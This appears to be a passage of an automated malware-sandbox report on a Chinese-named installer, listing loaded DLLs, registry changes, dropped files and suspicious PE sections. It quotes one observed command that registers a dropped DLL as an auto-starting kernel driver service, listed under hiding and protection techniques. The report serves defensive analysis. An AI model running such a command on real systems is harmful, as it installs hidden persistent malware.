Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic file information: File size 8648945 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2122040104.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2121917091.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00E257D0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: real checksum: 0x0 should be: 0x842330
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x34375f
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x34375f
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .#.q
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C8C5B push ecx; ret 6_2_6C9C8C6E
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C870F00 push ss; retn 0001h6_2_6C870F0A
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA96F10 push eax; ret 6_2_6CA96F2E
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9FB9F4 push 004AC35Ch; ret 6_2_6C9FBA0E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA45F4 push 00E4C35Ch; ret 10_2_00DA460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3FB10 push eax; ret 10_2_00E3FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3FE90 push eax; ret 10_2_00E3FEBE
Source: update.vac.1.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.6.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.6.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
